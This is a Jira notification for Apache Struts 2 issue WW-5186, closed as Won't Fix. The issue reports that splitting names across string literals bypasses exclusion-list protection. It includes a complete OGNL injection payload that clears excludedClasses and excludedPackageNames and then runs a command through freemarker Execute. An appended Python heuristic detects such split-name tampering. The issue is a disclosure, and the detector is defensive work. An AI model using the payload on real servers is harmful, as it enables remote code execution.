[ https://issues.apache.org/jira/browse/WW-5186?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Lukasz Lenart closed WW-5186.
-----------------------------
    Resolution: Won't Fix

> protect excludedClasses and excludedPackageNames
> ------------------------------------------------
>
>                 Key: WW-5186
>                 URL: https://issues.apache.org/jira/browse/WW-5186
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core
>    Affects Versions: 2.5.30, 6.0.0
>            Reporter: tanli
>            Priority: Major
>          Time Spent: 10m
>  Remaining Estimate: 0h
>
> protect excludedClasses and excludedPackageNames
> 1) Using the st062 exploit below, the attacker clears excludedPackageNames with
> {{'excluded'+'PackageNames'}}
> which also worked.
>
> {code:java}
> %{
> (#request.a=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.a.setBean(#request.get('struts.valueStack')) == true) +
> (#request.b=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.b.setBean(#request.get('a').get('context'))) +
> (#request.c=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.c.setBean(#request.get('b').get('memberAccess'))) +
> (#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
> }
> {code}
>
> 2) To protect Struts I pushed a patch with
> [struts pull|https://github.com/apache/struts/pull/567]

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
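The issue's point is that a plain substring filter for the exclusion-list names is defeated by splitting the name across OGNL string literals. The following detection heuristic, written here as an added example and not part of the issue or the Struts code base, folds adjacent `'a'+'b'` literals before matching; the sample expressions and the name `memberAccess` in the watch list are constructed assumptions.

```python
"""Flag OGNL expressions that try to reach the Struts member-access exclusion
lists, including names split across string literals ('excluded'+'PackageNames')."""
import re

# Names from the issue plus the memberAccess object they hang off (assumption).
SENSITIVE_NAMES = (
    "excludedClasses",
    "excludedPackageNames",
    "memberAccess",
)

# Two adjacent OGNL string literals joined with '+', e.g. 'excluded'+'PackageNames'
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def fold_string_concat(expr: str) -> str:
    """Repeatedly fold 'a'+'b' into 'ab' until nothing changes, so a name
    split across several literals reappears as one token."""
    previous = None
    while previous != expr:
        previous = expr
        expr = CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", expr)
    return expr


def naive_hits(expr: str) -> list:
    """Plain substring match, which the concatenation trick defeats."""
    return [name for name in SENSITIVE_NAMES if name in expr]


def tampering_hits(expr: str) -> list:
    """Substring match after folding concatenated literals."""
    return naive_hits(fold_string_concat(expr))


# Constructed request fragments for the demo; not taken from the issue.
SAMPLES = {
    "benign": "%{#request.userName}",
    "plain":  "%{#request.c.put('excludedClasses', {})}",
    "split":  "%{#request.c.put('excluded'+'PackageNames', {})}",
    "split3": "%{#request.c.put('exc' + 'luded' + 'Classes', {})}",
}

if __name__ == "__main__":
    for label, expr in SAMPLES.items():
        print(f"{label:7} naive={naive_hits(expr)} folded={tampering_hits(expr)}")
```

Folding literals closes only this one evasion; it is a log-review aid, not a substitute for the server-side fix the pull request proposes.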